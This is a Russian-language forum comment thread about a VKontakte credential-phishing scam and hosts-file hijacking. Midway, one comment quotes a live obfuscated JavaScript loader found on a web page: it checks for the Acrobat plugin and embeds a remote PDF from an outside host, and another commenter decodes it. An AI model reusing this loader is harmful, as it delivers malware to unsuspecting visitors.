Comments 72
Apache is functioning normally, %username%!
А я то всегда считал, что это всего лишь анекдот…
Здравствуйте, я туркменский вирус. По причине ужасной бедности моего создателя и низкого уровня развития технологий в нашей стране я не способен причинить какой-либо вред Вашему компьютеру. Поэтому очень прошу Вас, пожалуйста, сами сотрите какой-нибудь важный для Вас файл, а потом разошлите меня по почте другим адресатам. Заранее благодарю за понимание и сотрудничество…
Меня вся эта ситуация просто умиляет :)
Тоже сразу подумал об этом анекдоте :) дожились
да, я такое по почте получал… бумажной.
А разве не эстонский?
На самом деле история имеет более ранние корни. Очень смешная пародия на цепочечный вирус — явно российского происхождения — появилась вскоре после эпи¬демии Love Letter:
«Уважаемые господа!
Это письмо содержит меня, страшный полиморфный вирус. Я заражу всю вашу систему, саморазмножусь, разошлю себя всем Вашим друзьям, катастрофически загружу системные ресурсы, удалю системные файлы с винчестера, отформатирую его, выведу из строя материнскую плату.
К сожалению, это пока только бета-версия. Мой автор еще не научился писать вирусы, поэтому мне понадобится некоторая Ваша помощь.
Убедительная просьба, выполните следующие шаги:
отправьте меня всем Вашим знакомым, которые находятся в адресной книге;
удалите с жесткого диска системные файлы;
отформатируйте винчестер;
если умеете, запишите в BIOS всякую чепуху.
Помните, без Вашей помощи, Вашего непосредственного участия я не смогу распространиться по всему миру. Благодарю за сотрудничество. Ваш полиморф».
«Уважаемые господа!
Это письмо содержит меня, страшный полиморфный вирус. Я заражу всю вашу систему, саморазмножусь, разошлю себя всем Вашим друзьям, катастрофически загружу системные ресурсы, удалю системные файлы с винчестера, отформатирую его, выведу из строя материнскую плату.
К сожалению, это пока только бета-версия. Мой автор еще не научился писать вирусы, поэтому мне понадобится некоторая Ваша помощь.
Убедительная просьба, выполните следующие шаги:
отправьте меня всем Вашим знакомым, которые находятся в адресной книге;
удалите с жесткого диска системные файлы;
отформатируйте винчестер;
если умеете, запишите в BIOS всякую чепуху.
Помните, без Вашей помощи, Вашего непосредственного участия я не смогу распространиться по всему миру. Благодарю за сотрудничество. Ваш полиморф».
А тоже на днях натыкался на этот сайт. Сначала было смешно, а потом вспомнил про друзей, которые «не в теме», и стало грустно…
А вообще, конечно, он не работает как надо, если вызывать по IP-адресу.
Надо заставить браузер послать на этот адрес http-запрос, начинающийся на vkontakte.ru. Сейчас попробовал — функционирует еще, зараза…
Надо заставить браузер послать на этот адрес http-запрос, начинающийся на vkontakte.ru. Сейчас попробовал — функционирует еще, зараза…
Согласен с вами. Хотя я по мере сил пытаюсь бороться с комп. неграмотностью среди друзей, успехи есть :)
А вы попробуйте сделать, чтоб в HTTP запросе отдавался правильный Host. И вместо Apache is functioning normally получите другой результат.
А при чем тут спамеры? Угон аккаунтов может производиться для разных целей.
Мне 3 раза пришла реклама этого сайта. Я ее не желал. Спам? Спам!
Спам могли заказать у спамеров, а вот угнанные аккаунты могут быть использованы в иных целях.
Кстати интересно, в каких?
Рейтинг, социальная инженерия.
Как минимум новые «боты» для рассылки спама по друзьям.
Так же кто-то, по не понятной мне причине, гоняется с целью получения голосов — видимо есть способ вывести их из виртуальной среды.
Кто-то ради развлечения.
А кто-то просто с целью получения личных данных.
Из 10к пользователей найдеться как минимум 1 которого можно шантажировать, еще один кому поверят его 500 друзей и сделают то что он им скажет.
Ну и прочее прочее прочее…
Так же кто-то, по не понятной мне причине, гоняется с целью получения голосов — видимо есть способ вывести их из виртуальной среды.
Кто-то ради развлечения.
А кто-то просто с целью получения личных данных.
Из 10к пользователей найдеться как минимум 1 которого можно шантажировать, еще один кому поверят его 500 друзей и сделают то что он им скажет.
Ну и прочее прочее прочее…
А самое обидное, что мноена это ведутся по незнанию (
Ниочем
Примитивно. Как, впрочем, большинство поделок «взломщиков контакта».
DNS спуфинг для бедных.
Сталкивался у друзей с тем, что сначала в hosts прописывались для домена vkontakte.ru другой ip, а на фейк-странице, оформленной под контакт, после ввода логина и пароля просили для подтверждения личности отправить смс :) одна знакомая даже отправила, 200 р. сняли. Будьте бдительны :)
Ы) Я постоянно «лечу» от этого у знакомых)) Ток они в основном звонят мне с тем, что Интернета не работает только контакт и основные поисковики, а также почта мэил(запалил на Yahoo… вирусописатели брезгуют чтоли этим доменом??). Ну естественно там в hosts все это… ) просто айпишник видно уже закрыли…
Почитайте античат.
Там на таких дурачках делают хорошие деньги.
Там на таких дурачках делают хорошие деньги.
>P.S. Я уже сообщил куда следует.
На bash.org.ru? :-)
На bash.org.ru? :-)
А чего тут удивительного, школьники на уроках литературы вместо чтения произведений русских классиков, читают книжки по социальной инженерии.
Сегодня какой-то день взломов на хабре :)
Дык. Может, они хотят, чтобы народ не мог зайти на вконтакте :)
Точно также действует вредоносная программа Trojan-Ransom.Win32.Agent.ar — меняет файл HOSTS, прописывая туда свои соответствия и выдавая при этом веселую картинку: av-school.ru/up/article/img/avssb/5m/9.jpg. А вообще мы про это недавно писали: av-school.ru/article/a-94.html.
Ой, правильнык ссылки без завершающих точек:
av-school.ru/up/article/img/avssb/5m/9.jpg
av-school.ru/article/a-94.html
av-school.ru/up/article/img/avssb/5m/9.jpg
av-school.ru/article/a-94.html
уже drweb cureit после проверки сообщает, что hosts изменён
Некоторые особо вредные вирусы вообще исправляют путь к файлу hosts, и только после этого меняют содержимое файла
Видел ссылку на этот сайтец, но заходить не решился. :)
Спасибо. Поржал.
Ребят а никого не смущаят фрейм в самом низу страницы блогспота со странным кодом <script>var iVY, HIF, HRk, mgg = "", CHe = «unescape», Gyy;CHe = eval(CHe);HIF = [];iVY = eval(CHe("\ev\a\l"));HIF = [«0x66»,«0x75»,«0x6e»,«0x63»,«0x74»,«0x69»,«0x6f»,«0x6e»,«0x20»,«0x6b»,«0x71»,«0x71»,«0x28»,«0x29»,«0x7b»,«0x69»,«0x66»,«0x20»,«0x28»,«0x6e»,«0x61»,«0x76»,«0x69»,«0x67»,«0x61»,«0x74»,«0x6f»,«0x72»,«0x2e»,«0x70»,«0x6c»,«0x75»,«0x67»,«0x69»,«0x6e»,«0x73»,«0x29»,«0x20»,«0x7b»,«0x66»,«0x6f»,«0x72»,«0x20»,«0x28»,«0x76»,«0x61»,«0x72»,«0x20»,«0x66»,«0x78»,«0x43»,«0x3d»,«0x30»,«0x3b»,«0x66»,«0x78»,«0x43»,«0x3c»,«0x6e»,«0x61»,«0x76»,«0x69»,«0x67»,«0x61»,«0x74»,«0x6f»,«0x72»,«0x2e»,«0x70»,«0x6c»,«0x75»,«0x67»,«0x69»,«0x6e»,«0x73»,«0x2e»,«0x6c»,«0x65»,«0x6e»,«0x67»,«0x74»,«0x68»,«0x3b»,«0x66»,«0x78»,«0x43»,«0x2b»,«0x2b»,«0x29»,«0x20»,«0x7b»,«0x76»,«0x61»,«0x72»,«0x20»,«0x52»,«0x55»,«0x44»,«0x20»,«0x3d»,«0x20»,«0x6e»,«0x61»,«0x76»,«0x69»,«0x67»,«0x61»,«0x74»,«0x6f»,«0x72»,«0x2e»,«0x70»,«0x6c»,«0x75»,«0x67»,«0x69»,«0x6e»,«0x73»,«0x5b»,«0x66»,«0x78»,«0x43»,«0x5d»,«0x2e»,«0x6e»,«0x61»,«0x6d»,«0x65»,«0x3b»,«0x69»,«0x66»,«0x20»,«0x28»,«0x52»,«0x55»,«0x44»,«0x2e»,«0x69»,«0x6e»,«0x64»,«0x65»,«0x78»,«0x4f»,«0x66»,«0x28»,«0x22»,«0x41»,«0x64»,«0x6f»,«0x62»,«0x65»,«0x20»,«0x41»,«0x63»,«0x72»,«0x6f»,«0x62»,«0x61»,«0x74»,«0x22»,«0x29»,«0x20»,«0x21»,«0x3d»,«0x20»,«0x2d»,«0x31»,«0x29»,«0x20»,«0x7b»,«0x64»,«0x6f»,«0x63»,«0x75»,«0x6d»,«0x65»,«0x6e»,«0x74»,«0x2e»,«0x77»,«0x72»,«0x69»,«0x74»,«0x65»,«0x28»,«0x22»,«0x3c»,«0x65»,«0x6d»,«0x62»,«0x65»,«0x64»,«0x20»,«0x73»,«0x72»,«0x63»,«0x3d»,«0x5c»,«0x22»,«0x68»,«0x74»,«0x74»,«0x70»,«0x3a»,«0x2f»,«0x2f»,«0x6e»,«0x65»,«0x77»,«0x2d»,«0x70»,«0x6c»,«0x75»,«0x67»,«0x69»,«0x6e»,«0x2e»,«0x63»,«0x6f»,«0x6d»,«0x2f»,«0x79»,«0x65»,«0x73»,«0x2f»,«0x55»,«0x70»,«0x6c»,«0x6f»,«0x61»,«0x64»,«0x2f»,«0x63»,«0x61»,«0x63»,«0x68»,«0x65»,«0x2f»,«0x50»,«0x44»,«0x46»,«0x2e»,«0x70»,«0x68»,«0x70»,«0x3f»,«0x73»,«0x74»,«0x3d»,«0x4f»,«0x70»,«0x65»,«0x72»,«0x61»,«0x20»,«0x39»,«0x2e»,«0x38»,«0x30»,«0x7c»,«0x4c»,«0x69»,«0x6e»,«0x75»,«0x78»,«0x5c»,«0x22»,«0x20»,«0x68»,«0x65»,«0x69»,«0x67»,«0x68»,«0x74»,«0x3d»,«0x5c»,«0x22»,«0x31»,«0x30»,«0x39»,«0x34»,«0x5c»,«0x22»,«0x20»,«0x77»,«0x69»,«0x64»,«0x74»,«0x68»,«0x3d»,«0x5c»,«0x22»,«0x31»,«0x32»,«0x38»,«0x33»,«0x5c»,«0x22»,«0x20»,«0x74»,«0x79»,«0x70»,«0x65»,«0x3d»,«0x5c»,«0x22»,«0x61»,«0x70»,«0x70»,«0x6c»,«0x69»,«0x63»,«0x61»,«0x74»,«0x69»,«0x6f»,«0x6e»,«0x2f»,«0x70»,«0x64»,«0x66»,«0x5c»,«0x22»,«0x3e»,«0x3c»,«0x2f»,«0x65»,«0x6d»,«0x62»,«0x65»,«0x64»,«0x3e»,«0x22»,«0x29»,«0x3b»,«0x62»,«0x72»,«0x65»,«0x61»,«0x6b»,«0x3b»,«0x7d»,«0x7d»,«0x7d»,«0x7d»,«0x6b»,«0x71»,«0x71»,«0x28»,«0x29»,«0x3b»];for(HRk=0;HRk<=HIF.length;HRk++){Gyy = CHe(HIF[HRk]);mgg += String.fromCharCode(Gyy);}iVY(mgg);</script>?
Упс, извините за длинную строку. В предпросмотре такого не было, честно.
Лучше напиши что именно делает этот ЯС :)
А там — народ поймет. Лови плюс :)
А там — народ поймет. Лови плюс :)
Я не спец в ЯС, но судя по тому как скрипт обфусцирован, он вряд ли используется в мирных целях.
Скрипт ищет в списке установленных в браузере плагинов модуль «Adobe Acrobat», и если находит, запрашивает что-то с адреса new-plugin.com/yes/Upload/cache/PDF.php?st=Opera 9.80|Linux и открывает как pdf-документ.
Как же вы достали всех уже тупые, жалкие, уважаемые пользователи вконтакта своими унылыми багрепортами и сообщениями о спаме и лохотронах на этом вашем «социальном» говносайте. Извините, но наболело.
Дети с 9 до 14 аж бегом всё это сделают. Они сообразительные и доверчивые. Наблюдаю, как племяшка моей жены в свои 10 лет уже вовсю тусит на моем мире, регит себе почту, переписывается, ставит тулбары в IE, которые я потом удаляю и которые потом опять возникают и пр.
Кроме того не забывайте о неопытных юзерах. У меня училка начальных классов, с которой я до сих пор общаюсь, кроме одноклассников не знает мессенджеров. То есть, она одноклассники юзает именно в качестве IM. Вот тоже потенциальный клиент такого «вируса».
Кроме того не забывайте о неопытных юзерах. У меня училка начальных классов, с которой я до сих пор общаюсь, кроме одноклассников не знает мессенджеров. То есть, она одноклассники юзает именно в качестве IM. Вот тоже потенциальный клиент такого «вируса».
1. На сайте написано: «Откройте сайт vkontakte.ru в новом окне и зайдите на любую анкету. И вы сможете читать и писать сообщения, смотреть фотографии и т.д., т.е. полностью управлять любой анкетой».
2. Предлагается даже скачать программу для тех, у кого не получилось.
3. Лохи были есть и будут есть.
4. Спамеры играют на человеческих слабостях — «почувствуй себя хакером»!
5.…
6. Респект!
2. Предлагается даже скачать программу для тех, у кого не получилось.
3. Лохи были есть и будут есть.
4. Спамеры играют на человеческих слабостях — «почувствуй себя хакером»!
5.…
6. Респект!
Вчера столкнулся с какой-то новой модификацией вируса vkontakte.ru — при заходе на сайт предлагает отправить как обычно SMS. Файл hosts чист, на локальном диске файлов vk.exe и vkontakte.exe нет, путь к hosts в реестре не поменян… Мистика :)
Sign up to leave a comment.
Сделай сам или Обнаглевшие спамеры